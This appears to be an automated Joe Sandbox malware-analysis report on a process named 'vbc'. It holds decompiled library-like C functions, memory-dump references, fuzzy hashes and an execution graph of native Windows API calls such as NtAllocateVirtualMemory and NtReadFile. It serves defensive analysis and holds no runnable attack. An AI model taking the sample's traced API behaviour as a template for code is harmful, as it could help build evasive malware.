                                        0x0080234d
                                        0x00802251
                                        0x00802251
                                        0x00000000
                                        0x00802251
                                        0x008021a4
                                        0x008021a4
                                        0x008021a6
                                        0x008021a8
                                        0x008021ac
                                        0x008021b6
                                        0x008021b8
                                        0x008021bc
                                        0x008021be
                                        0x00000000
                                        0x00000000
                                        0x008021c0
                                        0x008021c2
                                        0x008021c4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008021c4
                                        0x008021c6
                                        0x008021c6
                                        0x008021c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008021c8
                                        0x008021a2
                                        0x00000000
                                        0x00802183
                                        0x007e057b
                                        0x007e057d
                                        0x007e0581
                                        0x007e0583
                                        0x00802178
                                        0x00000000
                                        0x007e0589
                                        0x007e058f
                                        0x007e058f
                                        0x007e0583
                                        0x00000000

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00802206
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-4236105082
                                        • Opcode ID: c688fce22fbb077bb614d42de7ea9fb1b8cbe94a3ff89290dd00a03eeed7f5df
                                        • Instruction ID: bf6a694b703252ee4c68a4068d017cdd013af9946fa3e2d9eff3c8d3ded03341
                                        • Opcode Fuzzy Hash: c688fce22fbb077bb614d42de7ea9fb1b8cbe94a3ff89290dd00a03eeed7f5df
                                        • Instruction Fuzzy Hash: 6F515975701201AFEB548A18CC8AF6673A9FBC8720F218229FD04DB2C1DAB5EC418790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007E14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E007E14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x882088; // 0x7562fcfd
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = L007D7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E007E13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = L007D7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = L007D7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E007A2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E007AE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                        0x007e14c0
                                        0x007e14cb
                                        0x007e14d2
                                        0x007e14d6
                                        0x007e14da
                                        0x007e14de
                                        0x007e14e3
                                        0x007e157a
                                        0x007e157a
                                        0x007e14f1
                                        0x007e14f3
                                        0x0080ea0f
                                        0x00000000
                                        0x0080ea15
                                        0x00000000
                                        0x0080ea15
                                        0x007e14f9
                                        0x007e14f9
                                        0x007e14fe
                                        0x007e1504
                                        0x0080ea1a
                                        0x0080ea1f
                                        0x0080ea21
                                        0x0080ea22
                                        0x0080ea27
                                        0x0080ea2a
                                        0x0080ea2a
                                        0x007e1515
                                        0x007e1517
                                        0x007e156d
                                        0x007e1572
                                        0x007e1575
                                        0x007e1575
                                        0x007e151e
                                        0x0080ea50
                                        0x0080ea55
                                        0x0080ea58
                                        0x0080ea58
                                        0x007e152e
                                        0x007e1531
                                        0x007e1533
                                        0x00000000
                                        0x007e1535
                                        0x007e1541
                                        0x007e1549
                                        0x007e1549
                                        0x007e1533
                                        0x007e14f3
                                        0x007e1559

                                        APIs
                                        • ___swprintf_l.LIBCMT ref: 0080EA22
                                          • Part of subcall function 007E13CB: ___swprintf_l.LIBCMT ref: 007E146B
                                          • Part of subcall function 007E13CB: ___swprintf_l.LIBCMT ref: 007E1490
                                        • ___swprintf_l.LIBCMT ref: 007E156D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        • Opcode ID: 6b80e88b6b73c48b62966ce6a10ac152a1b0fc5caaaee5cb0a9dac81a0ae3448
                                        • Instruction ID: b328f10f399a479cd02a38adfa1d167dc297ab0f82ffcb03e86e1472eab44faa
                                        • Opcode Fuzzy Hash: 6b80e88b6b73c48b62966ce6a10ac152a1b0fc5caaaee5cb0a9dac81a0ae3448
                                        • Instruction Fuzzy Hash: FF21E872A01619DBCB20DE59CC06AEB73BCFB98310F844551FD46E3140EB789A688BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007C53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E007C53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008801c0;
									_push(_t92);
									_push(0);
									_t37 = L0079F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L007E4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L007F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L007F3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0082217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L007F3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L007E3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E007C5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L0079F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L007E3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L0079F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L007E3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L0079F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L007E3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E007C5329(_t74, _t92);
													_push(1);
													_t48 = E007C53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                        0x007c53ab
                                        0x007c53ae
                                        0x007c53b1
                                        0x007c53b4
                                        0x007c53b7
                                        0x007e05b6
                                        0x007e05c0
                                        0x007e05c3
                                        0x00000000
                                        0x007e05c9
                                        0x007e05c9
                                        0x007e05cc
                                        0x007e05d5
                                        0x007e05d5
                                        0x007c53bd
                                        0x007c53bd
                                        0x007c53bd
                                        0x007c53be
                                        0x007c53be
                                        0x007c53be
                                        0x007c53c0
                                        0x00000000
                                        0x00000000
                                        0x00802269
                                        0x0080226d
                                        0x00802349
                                        0x0080234d
                                        0x00802273
                                        0x00802276
                                        0x00802279
                                        0x0080227e
                                        0x00802283
                                        0x00802287
                                        0x0080228a
                                        0x0080228d
                                        0x0080228f
                                        0x008022bc
                                        0x008022bc
                                        0x008022bc
                                        0x008022be
                                        0x008022c4
                                        0x008022cc
                                        0x008022d0
                                        0x008022d6
                                        0x008022d7
                                        0x008022da
                                        0x008022df
                                        0x008022e4
                                        0x00000000
                                        0x00000000
                                        0x008022e6
                                        0x008022e9
                                        0x008022f4
                                        0x008022f9
                                        0x008022fa
                                        0x00802305
                                        0x00802314
                                        0x00802319
                                        0x0080231a
                                        0x0080231d
                                        0x00802320
                                        0x00802323
                                        0x00802323
                                        0x00802328
                                        0x0080232d
                                        0x0080232f
                                        0x00802331
                                        0x00802336
                                        0x00802336
                                        0x0080233b
                                        0x0080233d
                                        0x00802350
                                        0x00802351
                                        0x00802356
                                        0x00802359
                                        0x00802359
                                        0x0080235b
                                        0x0080235d
                                        0x007c5367
                                        0x007c536b
                                        0x007c5372
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00802363
                                        0x00802363
                                        0x00802369
                                        0x0080236a
                                        0x0080236c
                                        0x00802371
                                        0x00802373
                                        0x00000000
                                        0x00802379
                                        0x00802379
                                        0x0080237a
                                        0x0080237f
                                        0x0080237f
                                        0x00802385
                                        0x00802386
                                        0x00802389
                                        0x0080238e
                                        0x00802390
                                        0x007c5378
                                        0x007c537c
                                        0x00802396
                                        0x00802396
                                        0x00802397
                                        0x0080239c
                                        0x008023a2
                                        0x008023a3
                                        0x008023a6
                                        0x008023ab
                                        0x008023ad
                                        0x00000000
                                        0x008023b3
                                        0x008023b3
                                        0x008023b4
                                        0x008023b9
                                        0x008023ba
                                        0x008023ba
                                        0x008023bc
                                        0x008023bf
                                        0x00000000
                                        0x00000000
                                        0x007f9153
                                        0x007f9158
                                        0x007f915a
                                        0x007f915e
                                        0x007f9160
                                        0x00000000
                                        0x007f9166
                                        0x007f9166
                                        0x007f9171
                                        0x007f9176
                                        0x007f9176
                                        0x00000000
                                        0x007f9160
                                        0x008023c6
                                        0x008023cb
                                        0x008023ce
                                        0x008023d7
                                        0x008023d7
                                        0x008023ad
                                        0x00802390
                                        0x00802373
                                        0x0080233f
                                        0x0080233f
                                        0x00000000
                                        0x0080233f
                                        0x00802291
                                        0x00802291
                                        0x00802293
                                        0x00802295
                                        0x0080229a
                                        0x008022a1
                                        0x008022a3
                                        0x008022a7
                                        0x008022a9
                                        0x00000000
                                        0x00000000
                                        0x008022ab
                                        0x008022ad
                                        0x008022af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008022af
                                        0x008022b1
                                        0x008022b4
                                        0x008022b4
                                        0x008022b6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008022b6
                                        0x0080228f
                                        0x00000000
                                        0x0080226d
                                        0x007c53cb
                                        0x007c53ce
                                        0x007c53d0
                                        0x007c53d4
                                        0x007c53d6
                                        0x00000000
                                        0x007c53d8
                                        0x007c53e3
                                        0x007c53ea
                                        0x007c53ea
                                        0x007c53d6
                                        0x00000000

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008022F4
                                        Strings
                                        • RTL: Resource at %p, xrefs: 0080230B
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008022FC
                                        • RTL: Re-Waiting, xrefs: 00802328
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-871070163
                                        • Opcode ID: 5254c3c694f9b3b18762357a504de30825bfde71cec8054d1ba825b66810184a
                                        • Instruction ID: e10a1ae7876a632deb1c3af436cad6de4e644a0377bd2f5d0da7bc5ee818276f
                                        • Opcode Fuzzy Hash: 5254c3c694f9b3b18762357a504de30825bfde71cec8054d1ba825b66810184a
                                        • Instruction Fuzzy Hash: 94513871601745ABDF119B69CC89FA673A8EF58364F11422DFD04DB281EBA9FC8187A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007DC558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 007DC5BB
                                        • 1z, xrefs: 007DC56F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: 1z${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                        • API String ID: 48624451-1258085685
                                        • Opcode ID: 464a861032d589b5e9095d6ea495c64f54b22909fdd3aef20cf3e44f22ecb178
                                        • Instruction ID: 81e97f5918e0f3d550c2f159c8d04cf5f0af57e8ba80d7572a1b24d818f9cd34
                                        • Opcode Fuzzy Hash: 464a861032d589b5e9095d6ea495c64f54b22909fdd3aef20cf3e44f22ecb178
                                        • Instruction Fuzzy Hash: B10188960085B075D32147A74C11833FBF99FCEA15718C48EF6D889296E17FC542D770
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:2.5%
                                        Dynamic/Decrypted Code Coverage:2.7%
                                        Signature Coverage:0%
                                        Total number of Nodes:445
                                        Total number of Limit Nodes:63
                                        execution_graph 57130 8d4cd 57133 89c90 57130->57133 57132 8d4d2 57134 89cb6 57133->57134 57139 78b70 57134->57139 57136 89cc2 57137 89ce6 57136->57137 57145 77e50 57136->57145 57137->57132 57167 78ac0 57139->57167 57141 78b84 57141->57136 57142 78b7d 57142->57141 57174 7cf80 57142->57174 57146 77e77 57145->57146 57147 77ff4 57146->57147 57417 7d180 57146->57417 57147->57137 57149 77f16 57149->57147 57150 8a280 RtlAllocateHeap 57149->57150 57151 77f2c 57150->57151 57152 8a280 RtlAllocateHeap 57151->57152 57153 77f3d 57152->57153 57154 8a280 RtlAllocateHeap 57153->57154 57155 77f4e 57154->57155 57427 7aee0 57155->57427 57157 77f61 57158 83a60 7 API calls 57157->57158 57159 77f72 57158->57159 57160 83a60 7 API calls 57159->57160 57161 77f83 57160->57161 57164 77f9c 57161->57164 57433 7ba50 57161->57433 57163 83a60 7 API calls 57166 77fba 57163->57166 57164->57163 57164->57166 57437 77c80 57166->57437 57169 78ad3 57167->57169 57168 78ae6 57168->57142 57169->57168 57182 89540 57169->57182 57171 78b23 57171->57168 57193 788e0 57171->57193 57173 78b43 57173->57142 57175 7cf99 57174->57175 57176 78b95 57175->57176 57409 88a60 57175->57409 57176->57136 57178 7cfd2 57179 7cffd 57178->57179 57412 884f0 57178->57412 57181 88720 NtClose 57179->57181 57181->57176 57183 89559 57182->57183 57199 83a60 57183->57199 57185 89571 57186 8957a 57185->57186 57228 89380 57185->57228 57186->57171 57188 8958e 57188->57186 57242 88190 57188->57242 57388 76e30 57193->57388 57195 78901 57195->57173 57196 788fa 57196->57195 57401 770f0 57196->57401 57200 83a74 57199->57200 57202 83b83 57199->57202 57200->57202 57249 885f0 57200->57249 57202->57185 57203 83bc7 57204 8a0b0 RtlFreeHeap 57203->57204 57205 83bd3 57204->57205 57205->57202 57206 83d59 57205->57206 57207 83d6f 57205->57207 57212 83c62 57205->57212 57208 88720 NtClose 57206->57208 57298 837a0 NtReadFile NtClose 57207->57298 57210 83d60 57208->57210 57210->57185 57211 83d82 57211->57185 57213 83cc9 57212->57213 57214 83c71 57212->57214 57213->57206 57220 83cdc 57213->57220 57215 83c8a 57214->57215 57216 83c76 57214->57216 57218 83c8f 57215->57218 57219 83ca7 57215->57219 57294 83660 NtClose LdrInitializeThunk LdrInitializeThunk 57216->57294 57252 83700 57218->57252 57219->57210 57262 83420 57219->57262 57295 88720 57220->57295 57221 83c80 57221->57185 57224 83c9d 57224->57185 57225 83cbf 57225->57185 57227 83d48 57227->57185 57229 89391 57228->57229 57230 893a3 57229->57230 57316 8a030 57229->57316 57230->57188 57232 893c4 57319 83070 57232->57319 57234 89410 57234->57188 57235 893e7 57235->57234 57236 83070 2 API calls 57235->57236 57238 89409 57236->57238 57238->57234 57351 843a0 57238->57351 57239 8949a 57361 88150 57239->57361 57241 89502 57241->57188 57241->57241 57243 881ac 57242->57243 57384 25ffae8 LdrInitializeThunk 57243->57384 57244 881c7 57246 8a0b0 57244->57246 57247 895e9 57246->57247 57385 88900 57246->57385 57247->57171 57250 8860c NtCreateFile 57249->57250 57299 891f0 57249->57299 57250->57203 57253 8371c 57252->57253 57254 83758 57253->57254 57255 83744 57253->57255 57257 88720 NtClose 57254->57257 57256 88720 NtClose 57255->57256 57258 8374d 57256->57258 57259 83761 57257->57259 57258->57224 57301 8a2c0 RtlAllocateHeap 57259->57301 57261 8376c 57261->57224 57263 8349e 57262->57263 57264 8346b 57262->57264 57265 834ba 57263->57265 57270 835e9 57263->57270 57266 88720 NtClose 57264->57266 57268 834dc 57265->57268 57269 834f1 57265->57269 57267 8348f 57266->57267 57267->57225 57271 88720 NtClose 57268->57271 57272 8350c 57269->57272 57273 834f6 57269->57273 57274 88720 NtClose 57270->57274 57275 834e5 57271->57275 57282 83511 57272->57282 57302 8a280 57272->57302 57276 88720 NtClose 57273->57276 57277 83649 57274->57277 57275->57225 57278 834ff 57276->57278 57277->57225 57278->57225 57281 83577 57283 835aa 57281->57283 57284 83595 57281->57284 57287 83523 57282->57287 57305 886a0 57282->57305 57286 88720 NtClose 57283->57286 57285 88720 NtClose 57284->57285 57285->57287 57288 835b3 57286->57288 57287->57225 57289 835df 57288->57289 57308 89e80 57288->57308 57289->57225 57291 835ca 57292 8a0b0 RtlFreeHeap 57291->57292 57293 835d3 57292->57293 57293->57225 57294->57221 57296 8873c NtClose 57295->57296 57297 891f0 57295->57297 57296->57227 57297->57296 57298->57211 57300 89200 57299->57300 57300->57250 57301->57261 57313 888c0 57302->57313 57304 8a298 57304->57282 57306 891f0 57305->57306 57307 886bc NtReadFile 57306->57307 57307->57281 57309 89e8d 57308->57309 57310 89ea4 57308->57310 57309->57310 57311 8a280 RtlAllocateHeap 57309->57311 57310->57291 57312 89ebb 57311->57312 57312->57291 57314 888ce 57313->57314 57315 888dc RtlAllocateHeap 57314->57315 57315->57304 57317 8a05d 57316->57317 57365 887d0 57316->57365 57317->57232 57320 83081 57319->57320 57321 83089 57319->57321 57320->57235 57322 8335c 57321->57322 57368 8b260 57321->57368 57322->57235 57324 830dd 57325 8b260 RtlAllocateHeap 57324->57325 57328 830e8 57325->57328 57326 83136 57329 8b260 RtlAllocateHeap 57326->57329 57328->57326 57330 8b390 2 API calls 57328->57330 57382 8b300 RtlAllocateHeap RtlFreeHeap 57328->57382 57332 8314a 57329->57332 57330->57328 57331 831a7 57333 8b260 RtlAllocateHeap 57331->57333 57332->57331 57373 8b390 57332->57373 57335 831bd 57333->57335 57336 831fa 57335->57336 57339 8b390 2 API calls 57335->57339 57337 8b260 RtlAllocateHeap 57336->57337 57338 83205 57337->57338 57340 8b390 2 API calls 57338->57340 57346 8323f 57338->57346 57339->57335 57340->57338 57343 8b2c0 RtlFreeHeap 57344 8333e 57343->57344 57345 8b2c0 RtlFreeHeap 57344->57345 57347 83348 57345->57347 57379 8b2c0 57346->57379 57348 8b2c0 RtlFreeHeap 57347->57348 57349 83352 57348->57349 57350 8b2c0 RtlFreeHeap 57349->57350 57350->57322 57352 843b1 57351->57352 57353 83a60 7 API calls 57352->57353 57354 843c7 57353->57354 57355 84402 57354->57355 57356 84415 57354->57356 57360 8441a 57354->57360 57357 8a0b0 RtlFreeHeap 57355->57357 57358 8a0b0 RtlFreeHeap 57356->57358 57359 84407 57357->57359 57358->57360 57359->57239 57360->57239 57362 8816c 57361->57362 57363 88183 57362->57363 57383 25ffdc0 LdrInitializeThunk 57362->57383 57363->57241 57366 891f0 57365->57366 57367 887ec NtAllocateVirtualMemory 57366->57367 57367->57317 57369 8b270 57368->57369 57370 8b276 57368->57370 57369->57324 57371 8a280 RtlAllocateHeap 57370->57371 57372 8b29c 57371->57372 57372->57324 57374 8b300 57373->57374 57375 8a280 RtlAllocateHeap 57374->57375 57376 8b35d 57374->57376 57377 8b33a 57375->57377 57376->57332 57378 8a0b0 RtlFreeHeap 57377->57378 57378->57376 57380 83334 57379->57380 57381 8a0b0 RtlFreeHeap 57379->57381 57380->57343 57381->57380 57382->57328 57383->57363 57384->57244 57386 8891c RtlFreeHeap 57385->57386 57387 891f0 57385->57387 57386->57247 57387->57386 57389 76e40 57388->57389 57390 76e3b 57388->57390 57391 8a030 NtAllocateVirtualMemory 57389->57391 57390->57196 57398 76e65 57391->57398 57392 76ec8 57392->57196 57393 88150 LdrInitializeThunk 57393->57398 57394 76ece 57395 76ef4 57394->57395 57397 88850 LdrInitializeThunk 57394->57397 57395->57196 57399 76ee5 57397->57399 57398->57392 57398->57393 57398->57394 57400 8a030 NtAllocateVirtualMemory 57398->57400 57404 88850 57398->57404 57399->57196 57400->57398 57402 7710e 57401->57402 57403 88850 LdrInitializeThunk 57401->57403 57402->57173 57403->57402 57405 8886c 57404->57405 57408 25ffb68 LdrInitializeThunk 57405->57408 57406 88883 57406->57398 57408->57406 57410 891f0 57409->57410 57411 88a7f LookupPrivilegeValueW 57410->57411 57411->57178 57413 8850c 57412->57413 57416 25ffed0 LdrInitializeThunk 57413->57416 57414 8852b 57414->57179 57416->57414 57418 7d1ac 57417->57418 57453 7d090 57418->57453 57421 7d1f1 57423 7d202 57421->57423 57426 88720 NtClose 57421->57426 57422 7d1d9 57424 7d1e4 57422->57424 57425 88720 NtClose 57422->57425 57423->57149 57424->57149 57425->57424 57426->57423 57428 7aef6 57427->57428 57430 7af00 57427->57430 57428->57157 57429 7afa8 57429->57157 57430->57429 57431 83a60 7 API calls 